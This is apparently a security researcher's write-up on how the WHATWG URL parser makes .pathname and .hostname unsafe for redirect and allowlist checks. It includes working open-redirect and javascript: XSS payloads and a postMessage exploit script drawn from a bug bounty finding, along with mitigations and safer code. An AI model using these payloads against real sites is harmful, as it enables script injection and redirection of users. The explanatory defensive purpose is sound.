Claims
- new URL(userControlled).pathname is not safe to feed into location.href. For special schemes (http, https, ws, wss, ftp, file) it can start with // and turn into an open redirect. For non-special schemes it can start with javascript: and turn into XSS.
- The .hostname of a URL is also not safe to allowlist against, because browsers happily parse javascript://...stuff...evil.com into a "URL" whose hostname ends in your trusted domain.
- Both behaviors come straight from the WHATWG URL Standard. Browsers are doing the spec-conformant thing. The bugs are in the application code.
- The URL API looks like a sanitizer and, if done right, it can be a sanitizer, but it comes with a few footguns.
What started this
I saw a Critical Thinking Podcast short that pointed out that a javascript: URL parsed by new URL() can end up with a hostname attribute. This is kind of weird. It turns out a lot of code on the web relies on attributes of URL-parsed objects to validate user-controlled data, and there is more than one way this can go wrong. I'll explore two of them here.
Extra slashes in special URLs
This is a standard pattern and looks fine on first read:
// redirect client to the path of a given URL
const userControlledURL = new URL(userControlled)
location.href = userControlledURL.pathname
You would expect the code to just pull out the path, so even if userControlled is something like https://evil.com/foo, the code will navigate to /foo on the current origin. Reasonable.
But:
(new URL("https://nice.com//evil.com")).pathname
// -> "//evil.com"
If userControlled === "https://nice.com//evil.com", the snippet above sets location.href = "//evil.com", which the browser resolves as a protocol-relative URL, straight to https://evil.com. Open redirect.
The browser treats / as a path-segment separator inside path state. The relevant rule, paraphrased: "if c is /, then terminate the current path segment." (the same is true for \ by the way).
So tracing https://nice.com//evil.com through the parser: after https://nice.com is consumed, path state runs with c = / and an empty buffer. Special URL, c is / → terminate the (empty) segment. Path is now [""]. Then it reads evil.com into the buffer, end-of-input flushes it. Final path: ["", "evil.com"]. The serializer joins with / and prefixes one, giving "//evil.com".
For https: URIs the path is guaranteed to start with a /. That doesn't save you here: //evil.com also starts with /.
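The backslash variant from the parenthetical above is easy to confirm outside a browser, since Node ships the same WHATWG parser. A quick sketch (the single backslash in the input is written as an escaped `\\` in the string literal):

```javascript
// In a special-scheme path, the parser treats "\" exactly like "/",
// so "/\" produces an empty leading segment just like "//" does.
const u = new URL("https://nice.com/\\evil.com");
console.log(u.pathname); // "//evil.com" — protocol-relative again
```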
It gets worse with custom schemes
For non-special schemes, if the scheme isn't followed by //, the parser goes straight to path state and the pathname gets no leading /:
(new URL("bla:javascript:alert(1)")).pathname
// -> "javascript:alert(1)"
So if userControlled === "bla:javascript:alert(1)" and the same redirect snippet runs:
location.href = "javascript:alert(1)"
XSS!
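Both failure modes can be rejected before the pathname is ever used. A minimal sketch of a safer version of the redirect snippet (the function name and the "/" fallback are my own choices, not from any library):

```javascript
// Sketch: extract a same-origin path from untrusted input, or fall back to "/".
// Guards against both problems above: non-special schemes whose "pathname" is
// an opaque string like "javascript:alert(1)", and special-scheme paths that
// begin with "//" and would be resolved as protocol-relative URLs.
function extractSafePath(userControlled) {
  let url;
  try {
    url = new URL(userControlled);
  } catch {
    return "/"; // not parseable at all
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return "/";
  if (url.pathname.startsWith("//")) return "/"; // protocol-relative escape
  return url.pathname;
}

console.log(extractSafePath("https://evil.com/foo"));       // "/foo"
console.log(extractSafePath("https://nice.com//evil.com")); // "/"
console.log(extractSafePath("bla:javascript:alert(1)"));    // "/"
```

Checking the scheme first is the load-bearing part; the startsWith("//") check also covers the backslash variant, because the serializer has already normalized `\` to `/` by the time you read .pathname.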
Quick write-up of a real-world bug bounty finding
Back to the initial observation that javascript: URLs can have non-falsey .hostname/.host attributes. After learning that, I went back to a target with a web message handler that I had looked at before but didn't manage to exploit. The vulnerable code was a message handler that looked roughly like this:
window.addEventListener("message", (event) => {
let data = event.data;
if (data?.event_type === "NAVIGATE") {
try {
let t = new URL(data.href);
if (
t.hostname.endsWith(".target.com")
) {
router.push(data.href);
}
} catch {}
}
});
Two things going wrong:
- No event.origin check on the message itself.
- As pointed out: .hostname of a parsed URL is not what you think it is when the URL has a non-special scheme.
To get a .hostname, the string still has to start with [SCHEME]://... — and that is still possible while keeping a functioning XSS payload. To check this yourself, try this in the DevTools console:
> let url = new URL("javascript://%0aconsole.log('pwned')%2f%2f.example.com/")
> url.hostname
"%0aconsole.log('pwned')%2f%2f.example.com"
> url.host
"%0aconsole.log('pwned')%2f%2f.example.com"
> window.location = url.href
// pwned
This is the WHATWG behavior: the spec lets non-special URLs carry an authority. So the exploit:
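The parse result does still tell you what's going on — just not in .hostname. A quick check (runnable in Node, which uses the same parser; the .example.com suffix stands in for the real target domain):

```javascript
const url = new URL("javascript://%0aconsole.log('pwned')%2f%2f.example.com/");

// The suffix check the vulnerable handler relied on happily passes...
console.log(url.hostname.endsWith(".example.com")); // true

// ...even though the scheme was never anything but javascript:
console.log(url.protocol); // "javascript:"
console.log(url.origin);   // "null" — non-special schemes get an opaque origin
```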
const win = window.open("https://www.target.com/")
await new Promise(r => setTimeout(r, 600)) // wait for load
win.postMessage({
"event_type": "NAVIGATE",
"href": "javascript://%0aalert(document.domain)%2f%2f.target.com/"
}, "*")
new URL(data.href) parses, .hostname is %0aalert(document.domain)%2f%2f.target.com (and therefore ends with .target.com), suffix check passes. router.push(data.href) runs with the same string, the browser navigates to a javascript: URL, and:
- %0a decodes to a newline, terminating the JS comment that the // opened
- alert(document.domain) runs on the next line
- //.target.com/ is a trailing comment
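You can decode the payload mechanically to see exactly that script. On navigation the browser takes everything after "javascript:" as the script body and percent-decodes it before executing:

```javascript
const href = "javascript://%0aalert(document.domain)%2f%2f.target.com/";

// %0a -> newline, %2f -> "/": the decoded body is
//   line 1: "//"                        (comment)
//   line 2: alert(document.domain)//.target.com/
const body = decodeURIComponent(href.slice("javascript:".length));
console.log(body);
```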
Wrapping up
Going back to the claims at the top: URL can be used as a sanitizer, but only if you check the scheme first. Without that check, .pathname, .hostname, .host are just components of the parse result, and what those components mean depends entirely on the scheme. Two vectors discussed above are instances of the same mistake: trusting a component without first asking whether the scheme makes that component meaningful:
- .pathname looks like a relative path, but for special URLs it can start with // (backslash trick), and for non-special URLs it can be javascript:alert(1) (opaque path).
- .hostname looks like a hostname, but for non-special URLs it's whatever bytes the spec lets you stuff between // and the next path-terminating character.
A short list of things that are probably safe for redirect/allowlist code:
- Compare parsed.origin === "https://your.exact.origin" and reject anything else.
- Explicitly check parsed.protocol === "https:" before doing anything with parsed.hostname.
- If you want to redirect to a path, prefix it: window.location = window.location.origin + "/" + parsed.pathname.substr(1).
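Putting the first two bullets together, a sketch of an allowlist check that asks about the scheme before anything else ("https://app.example.com" and ".example.com" are placeholders for your own values):

```javascript
// Sketch: validate an untrusted href against an origin/suffix allowlist.
// Nothing about the parse result is meaningful until the scheme is pinned down.
function isAllowedHref(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return false;
  }
  if (url.protocol !== "https:") return false; // scheme first, always
  // Exact-origin match, or a dot-anchored suffix match on the hostname.
  return url.origin === "https://app.example.com" ||
         url.hostname === "example.com" ||
         url.hostname.endsWith(".example.com");
}

console.log(isAllowedHref("javascript://%0aalert(1)%2f%2f.example.com/")); // false
console.log(isAllowedHref("https://docs.example.com/path"));               // true
console.log(isAllowedHref("https://evilexample.com/"));                    // false
```

The dot-anchored endsWith is only safe here because the protocol check has already ruled out the non-special schemes that made .hostname meaningless in the first place.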